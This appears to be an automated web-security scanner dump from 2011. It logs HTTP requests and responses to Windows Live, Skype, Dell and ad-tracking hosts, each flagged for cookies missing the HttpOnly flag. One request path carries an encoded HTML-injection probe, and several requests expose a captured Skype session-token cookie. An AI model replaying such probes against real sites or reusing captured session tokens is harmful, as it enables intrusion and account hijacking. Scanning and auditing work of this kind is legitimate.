GET /si/login.aspx/x22 HTTP/1.1 Host: mid.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 2491 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Set-Cookie: lc=en-US; path=/ X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 04 Sep 2011 21:48:27 GMT Connection: close
<html> <head> <title>Windows Live ID</title> <meta name="MobileOptimized" content="100"/> <link type="text/css" rel="stylesheet" href="/hig.css"/> </head> <body> <form id="EmailPasswordForm" na ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
lc=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /si/login.aspx/x3c/cite/x3e/x3cspan HTTP/1.1 Host: mid.live.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 2560 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 Set-Cookie: lc=en-US; path=/ X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sun, 04 Sep 2011 21:48:29 GMT Connection: close
<html> <head> <title>Windows Live ID</title> <meta name="MobileOptimized" content="100"/> <link type="text/css" rel="stylesheet" href="/hig.css"/> </head> <body> <form id="EmailPasswordForm" na ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Cache-Control: private Cteonnt-Length: 422187 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: TocHashCookie=ms310241(n)/aa155073(n)/aa902560(n)/aa342502(VS.85,n)/aa342504(VS.85,n)/na/; expires=Thu, 05-Sep-2041 02:23:09 GMT; path=/ X-AspNetMvc-Version: 3.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Mon, 05 Sep 2011 02:23:09 GMT Content-Length: 422187
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 302 Moved Temporarily Date: Sun, 04 Sep 2011 21:13:41 GMT P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA" Set-Cookie: 33x_ps=u%3D8939182109%3As1%3D1314119008217%3Ats%3D1314119008217; Domain=.33across.com; Expires=Mon, 03-Sep-2012 21:13:41 GMT; Path=/ Location: http://ib.adnxs.com/mapuid?t=2&member=1001&user=8939182109&seg=150349&seg_code=33x&redir=http%3A%2F%2Fad.yieldmanager.com%2Fpixel%3Ft%3D2%26id%3D1211914&random=918826 Content-Length: 0 Connection: close Content-Type: text/plain; charset=UTF-8
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /www/delivery/ajs.php?zoneid=26&target=_blank&cb=51874693474&charset=ISO-8859-1&loc=http%3A//lwn.net/Articles/456878/%23A&referer=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue HTTP/1.1 Host: rotation.linuxnewmedia.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://lwn.net/Articles/456878/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Cache-Control: private,max-age=0 Date: Sun, 04 Sep 2011 16:20:00 GMT Content-Type: text/html; charset=utf-8 Expires: Wed, 01 Jan 1997 12:00:00 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=7 P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:20:00 GMT; path=/ Vary: Accept-Encoding Content-Length: 68855
// menu definition for c=us&l=en&s=bsd&cs=04 // var m_0_0_Menu = new Array( new menuItem( "Laptops", "http://www.dell.com/p/vostro-laptop-deals.aspx?c=us&cs=04&l=en&s=bsd" ), new menuItem( "Desktops ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
HTTP/1.1 200 OK Cache-Control: private,max-age=0 Date: Sun, 04 Sep 2011 16:19:59 GMT Content-Type: text/html; charset=utf-8 Expires: Wed, 01 Jan 1997 12:00:00 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=7 P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/ Set-Cookie: dellsearch=srchb=control&rpp=12; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/ Set-Cookie: StormSCookie=bandwidth=NA; domain=.dell.com; path=/ Vary: Accept-Encoding Content-Length: 90930
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd"> <!-- Contents of this file are Copyright 2011, Dell Inc. --> <html> <head> <TITLE>xss - ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /login HTTP/1.1 Host: secure.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/bike/avatar-theme/candy/avatar-collection/transit/avatar-display-size/message HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/camera/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message HTTP/1.1 Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5 Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/dog/avatar-theme/candy/avatar-collection/animals/avatar-display-size/message HTTP/1.1 Host: skypec.i.lithium.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/maracas/avatar-theme/candy/avatar-collection/music/avatar-display-size/message HTTP/1.1 Host: skypec.i.lithium.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/pyramids/avatar-theme/candy/avatar-collection/architecture/avatar-display-size/message HTTP/1.1 Host: skypec.i.lithium.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/trumpet/avatar-theme/candy/avatar-collection/music/avatar-display-size/message HTTP/1.1 Host: skypec.i.lithium.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/image/serverpage/avatar-name/video/avatar-theme/candy/avatar-collection/tech/avatar-display-size/message HTTP/1.1 Host: skypec.i.lithium.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: http://community.skype.com/t5/English/ct-p/English?profile.language=en Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/3400302BF95FC3FDC82E2238CD4B03BF/lia-scripts-body-min.js HTTP/1.1 Host: skypec.i.lithium.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://community.skype.com/t5/Android/Skype-for-Android-2-1-released-More-video-calling-on-more/td-p/59456
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/6141DE8643E58E1BA36A2E83A753DBF6/lia-scripts-body-min.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: http://community.skype.com/t5/help/faqpage/faq-category-id/posting Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/6778FE2463E46547727F5578E599B73F/lia-scripts-body-min.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: http://community.skype.com/t5/Windows/noptrix-net-Public-Security-Advisory-gt-gt-gt-xss-issue-on-Skype/m-p/24028/highlight/true Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/A07927DB54138E290B0015853D34D7F4/lia-scripts-body-min.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: http://community.skype.com/t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t5/scripts/FF39E6887C1CF11C1CFC610DDF1DED02/lia-scripts-common-min.js HTTP/1.1 Accept: application/javascript, */*;q=0.8 Referer: http://community.skype.com/t5/forums/searchpage/tab/message?filter=location&location=Category%3AEnglish&q=xss Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: skypec.i.lithium.com Proxy-Connection: Keep-Alive
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
HTTP/1.1 200 OK Connection: close Date: Sun, 04 Sep 2011 16:19:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAJAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAAPekY07WpGNOBQAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAD3pGNO1qRjTgAAAAA-; path=/; expires=Wed, 01-Sep-2021 16:19:03 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Pragma: no-cache Expires: -1 Cache-Control: no-cache Content-type: image/gif Content-Length: 67
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /rd?cid=901pdb6671&mid=901qz26673&mkwid=s1CStlI5S&pcrid=13885348293&pkw=application%20security%20web&pmt=b&lp=http://altfarm.mediaplex.com/ad/ck/12309-80794-34740-0?kw=application%20security%20web&mpre=http%3A%2F%2Flt%2Edell%2Ecom%2Flt%2Flt%2Easpx%3FCID%3D64824%26LID%3D1652027%26DGC%3DST%26DGSeg%3DBSD%26DURL%3Dhttp%253A%252F%252Fcontent%252Edell%252Ecom%252Fus%252Fen%252Fbusiness%252Fsecurity%252Dnetwork%252Easpx%3Fst%3Dapplication%20security%20web%26ACD%3Ds1CStlI5S,13885348293,901qz26673 HTTP/1.1 Host: tracker.marinsm.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /track.php?ie=1&a1017=&b1017=&a1017exit=&a=1017&u=http%3A%2F%2Fwww.radware.com%2F&r=&t=1315153232081 HTTP/1.1 Host: trk.etrigue.com Proxy-Connection: keep-alive Referer: http://www.radware.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.114./en/help HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: ui.skype.com Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 21:03:33 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170213:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 21:03:33 GMT; path=/; domain=.skype.com; Location: https://support.skype.com/ Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.114./en/upgrade HTTP/1.1 User-Agent: Skype Upgrade Host: ui.skype.com
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 21:04:44 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:LC=en-us:TM=1315170284:TS=1315170284:TZ=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 21:04:44 GMT; path=/; domain=.skype.com; Location: http://download.skype.com/SkypeSetupFull.exe Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.114./en/upgraded HTTP/1.1 User-Agent: Skype. 5.5 Host: ui.skype.com Pragma: no-cache
Response
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 17:58:15 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:LC=en-us:TM=1315159095:TS=1315159095:TZ=:VER=0/5.5.0.114/0; expires=Mon, 03-Sep-12 17:58:15 GMT; path=/; domain=.skype.com; Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/apps HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: ui.skype.com Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 21:08:54 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:08:54 GMT; path=/; domain=.skype.com; Location: http://www.skype.com/go/apps Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/prices HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: ui.skype.com Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 21:14:10 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:14:10 GMT; path=/; domain=.skype.com; Location: http://www.skype.com/go/prices Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/share HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: ui.skype.com Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 21:13:37 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170817:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:13:37 GMT; path=/; domain=.skype.com; Location: http://www.skype.com/go/share?SkypeName=&FriendEmailAddr_1=&FriendEmailAddr_2=&FriendEmailAddr_3=&FriendEmailAddr_4=&FriendEmailAddr_5=&FriendEmailAddr_6=&FriendName_1=&FriendName_2=&FriendName_3=&FriendName_4=&FriendName_5=&FriendName_6= Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ui/0/5.5.0.115./en/go/subscriptions?country= HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: ui.skype.com Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; VISITORID=1344388383; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170850:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 21:27:02 GMT Server: Apache Cache-control: no-cache, must revalidate Pragma: no-cache Expires: 0 Set-Cookie: SC=CC=:CCY=:E70B9EF1770AF398=:LC=en-us:TM=1315171622:TS=1315171562:TZ=:VER=0/5.5.0.115/0; expires=Mon, 03-Sep-12 21:27:02 GMT; path=/; domain=.skype.com; Location: http://www.skype.com/go/subscriptions?cm_mmc=Skype-_-Dynamic_Content-_-Subscriptions-_-Generic4 Content-Length: 0 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ns/products/web-site-firewall-overview.php?&a=google-na_WebAppFirewallWW_WebApplicationSecurity&kw=web%20application%20security&gclid=CP2344L_g6sCFUsaQgodmjw72Q HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
